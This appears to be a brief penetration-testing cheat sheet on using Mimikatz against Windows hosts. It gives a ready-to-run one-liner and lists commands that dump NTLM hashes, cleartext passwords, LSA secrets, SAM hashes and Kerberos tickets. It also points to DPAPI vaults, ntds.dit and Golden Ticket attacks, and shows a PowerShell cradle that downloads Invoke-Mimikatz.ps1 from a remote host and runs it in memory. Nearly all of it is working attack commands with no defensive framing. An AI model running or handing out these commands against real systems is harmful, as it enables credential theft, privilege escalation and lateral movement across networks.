Mimikatz
Can build from here https://github.com/gentilkiwi/mimikatz/releases
After unzipping run mimikatz.exe on cmd
one-liner:
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"privilege::debugshould result

sekurlsa::logonpasswordsorsekurlsa::msvgives ntlm hashes for passwords which can be passed around and also cleartext passwords sometimeslsadump::lsa /injectto get lsa passwordslsadump::samorlsadump::sam /patchto dump SAM hashesTo dump lsa secrets:
lsadump::secretslsadump::lsa /patchdumps local security authority logon sessions

To get tickets
sekurlsa::tickets /exportDPAPI:
Invoke-Mimikatz -Command '"vault::list"'ntds.dit file can be downloaded too
Golden Ticket Attacks are also possible
Powershell
Use Nishang Invoke-Mimikatz.ps1
iex (iwr -UseBasicParsing http://10.11.103.226/Invoke-Mimikatz.ps1)Do this
Invoke-Mimikatz -Command '"token::elevate"'Last updated
Was this helpful?